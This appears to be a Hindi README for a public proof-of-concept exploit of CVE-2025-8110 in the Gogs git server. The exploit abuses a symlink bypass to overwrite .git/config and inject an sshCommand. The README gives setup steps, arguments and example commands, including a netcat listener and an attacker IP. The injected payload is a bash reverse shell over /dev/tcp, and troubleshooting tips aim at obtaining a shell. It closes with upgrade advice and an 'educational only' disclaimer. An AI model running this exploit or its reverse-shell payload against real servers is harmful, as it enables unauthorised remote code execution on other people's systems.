
Gogs RCE PoC - CVE-2025-8110
CVE-2025-8110 के लिए प्रूफ ऑफ कॉन्सेप्ट - सिमलिंक बायपास और sshCommand इंजेक्शन के माध्यम से Gogs में रिमोट कोड एक्ज़ीक्यूशन।
यह एक्सप्लॉइट Gogs API में सिमलिंक बायपास का दुरुपयोग करके .git/config को ओवरराइट करता है और दुर्भावनापूर्ण sshCommand इंजेक्ट करता है जो एक रिवर्स शेल निष्पादित करता है।
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
तर्क विवरण -u, --url लक्ष्य Gogs URL (जैसे, http://target:3000) -U, --username Gogs उपयोगकर्ता नाम -P, --password Gogs पासवर्ड -t, --token Gogs API टोकन -lh, --host रिवर्स शेल के लिए आपका IP -lp, --port लिसनर के लिए आपका पोर्ट -x, --proxy प्रॉक्सी सक्षम करें (localhost:8080)
Gogs में लॉगिन करें → सेटिंग्स → एप्लिकेशन → टोकन जनरेट करें
nc -lvnp 4444
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444
.git/config के लिए सिमलिंक के साथ रिपॉजिटरी बनाता हैsshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' # इंजेक्ट करता हैसमस्या समाधान लॉगिन विफल उपयोगकर्ता नाम/पासवर्ड जांचें रिपॉजिटरी निर्माण विफल API टोकन पुनर्जनित करें रीड टाइमआउट सामान्य - लिसनर जांचें कोई शेल नहीं फायरवॉल जांचें, अलग पोर्ट आज़माएँ
.git/config में sshCommandGogs v0.13.4 या बाद के संस्करण में अपडेट करें:
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण के लिए है। अनधिकृत पहुँच अवैध है।